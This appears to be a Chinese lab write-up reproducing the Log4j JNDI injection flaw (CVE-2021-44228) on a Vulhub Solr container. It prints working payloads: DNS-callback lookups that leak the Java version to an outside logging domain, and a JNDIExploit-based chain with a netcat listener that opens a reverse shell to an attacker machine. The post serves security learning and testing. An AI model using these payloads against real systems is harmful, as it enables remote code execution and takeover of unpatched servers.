前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >log4j-CVE-2021-44228-vulhub复现

log4j-CVE-2021-44228-vulhub复现

作者头像
乌鸦安全
发布2021-12-21 16:11:10
3.5K0
发布2021-12-21 16:11:10
举报
文章被收录于专栏:乌鸦安全乌鸦安全

✎ 阅读须知

乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经授权,不得用于其他。

本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!

01

漏洞描述

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。

参考地址:

代码语言:javascript
复制
https://github.com/vulhub/vulhub

本次漏洞复现也是基于Vulhub

02

漏洞环境搭建

代码语言:javascript
复制
docker-compose up -d --build

访问http://127.0.0.1:8983/solr/#/

03

Dnslog测试

在DNSlog平台请求一个dns域名:3j7r1s.dnslog.cn

构造:

${jndi:dns://${sys:java.version}.example.com}是利用JNDI发送DNS请求的Payload:

代码语言:javascript
复制
http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.3a5h27.dnslog.cn}

直接访问:

代码语言:javascript
复制
http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.3j7r1s.dnslog.cn}

此时直接得到版本信息:1.8.0

或者是请求:

代码语言:javascript
复制
http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://cd9097fd.dns.1433.eu.org}

04

反弹shell

反弹shell需要使用JNDIExploit.v1.2,可以从下面百度云直接下载:

详细的信息可以参考上一篇文章

代码语言:javascript
复制
https://pan.baidu.com/s/1lxXt-27-i7I_dOUACphVtQ 提取码: nkc5

网络拓扑:

攻击机:10.211.55.23

靶机:10.211.55.2

中转机:10.211.55.3

中转机java版本:1.8.0_172

首先在中转机上使用JNDIExploit-1.2-SNAPSHOT.jar文件使用java启动,命令如下:

代码语言:javascript
复制
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 10.211.55.3

其中:10.211.55.3为中转机的ip地址

然后在攻击机上开启监听:nc -lvvp 6666

此时构造如下命令:

代码语言:javascript
复制
http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://10.211.55.3:1389/Basic/ReverseShell/10.211.55.23/6666}

其中:

  • http://127.0.0.1:8983为靶机的地址
  • 10.211.55.3为中转机地址
  • 10.211.55.23为Kali攻击机ip地址,此时要反弹shell

更多用法可以参考:

代码语言:javascript
复制
https://github.com/zzwlpx/JNDIExploit

直接执行之后,shell就弹回来了

此时在中转机器上:

成功!

清除环境:docker-compose down

05

注 意 事 项

中转机的java版本:1.8.0_172

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-12-17,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 乌鸦安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
容器服务
腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档